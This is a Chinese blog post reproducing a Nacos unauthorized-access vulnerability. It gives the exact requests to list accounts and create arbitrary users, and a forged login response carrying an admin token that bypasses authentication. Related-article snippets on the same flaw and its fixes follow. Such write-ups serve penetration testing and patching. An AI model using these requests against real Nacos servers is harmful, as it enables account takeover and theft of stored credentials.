Nacos 未授权访问漏洞复现

最新推荐文章于 2024-10-10 17:51:40 发布
最新推荐文章于 2024-10-10 17:51:40 发布
阅读量725 收藏
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58609150/article/details/131615164
版权
文章揭示了一个Nacos系统中的安全问题,允许通过GET请求读取账号密码,并能通过POST请求无授权创建账户。此外,通过抓包工具修改HTTP响应包内容,可以绕过身份验证,非法进入后台。这表明系统存在严重的权限管理和认证漏洞。
摘要由CSDN通过智能技术生成

漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9

 读取账号密码

任意创建账户
POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1
抓包将get方式修改为post并重放

账户已被创建

 未授权进入后台

输入任意密码bp抓包修改返回包即可绕过进入后台

修改回包内容如下

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

 成功进入后台

 

海蓝时跃鲸
关注
web渗透测试漏洞复现nacos授权访问漏洞复现并getshell
HACKONE的博客
03-30 1092
nacos授权访问
Alibaba Nacos授权访问漏洞复现
zyl404的博客
01-26 5137
Alibaba Nacos授权访问漏洞复现 漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。 通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 环境搭建 下载地址 https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nac
nacos源码之Auth(权限)模块-1(授权过滤器与控制器缓存)
qq_26462567的博客
05-13 2975
NacosAuth模块NacosAuth模块Secured注解(权限核心注解)注解实现讲解权限操作类型权限配置 上一篇《nacos源码构建与总览》浏览器还挺多,接下来模块的精讲来了 《nacos源码构建与总览》 NacosAuth模块 auth模块管理了nacos的权限,该权限系统设计面向租户模式,功能比较简单,不适用于业务系统。 Secured注解(权限核心注解) 源码如下: package com.alibaba.nacos.auth.annotation; @Retention(Rete
Nacos漏洞总结复现_nacos默认jwt密钥导致授权访问
最新发布
VN520的博客
10-10 1241
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1452
JDK安装2023最完整教程与配置(零基础)
Nacos授权访问漏洞复现
apple_52661176的博客
07-09 1394
nacos授权访问漏洞的几种姿势
Nacos授权访问复现及修复
大数据姐姐
01-22 4198
Nacos授权访问修复,开启鉴权
Nacos漏洞修复】Nacos授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 9771
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
Nacos身份绕过漏洞复现(QVD-2023-6271)
qq_42751192的博客
08-19 290
Nacos 是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。
Nacos权限认证绕过漏洞复现
时乙的博客
03-12 2650
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
Nacos授权访问
zkaqlaoniao的博客
12-08 2030
漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
【渗透实战】Nacos授权访问(CVE-2021-29441)
Nafia的博客
02-20 4674
Nacos授权访问漏洞挖掘记录
Nacos漏洞总结复现
heike_Ch的博客
04-23 1469
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
spring 微服务nacos授权访问漏洞修复
whandgdh的博客
06-17 7425
spring 微服务nacos授权访问漏洞修复
Nacos 授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 1129
Nacos 授权访问(CVE-2021-29441)
Nacos授权访问修复方案
moonlingh的博客
03-24 4481
Nacos 是 SpringCloud Alibaba 微服务架构中的一个组件,主要作用是服务注册和发现以及分布式配置管理,通常情况下 Nacos 中存储着 MySQL、Redis 等数据库的账号和密码。当前使用的版本存在用户读取、添加、登陆的漏洞
src实战-两处nacos授权访问
hackzkaq的博客
10-11 298
前几天刚做过nacos授权访问的靶场,所以今天心血来潮去搜索了一下相关资产,没想到还真找到了。
Nacos授权访问漏洞(CVE-2021-29441)复现
一纸荒芜的博客
10-26 3124
Nacos授权访问漏洞复现
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值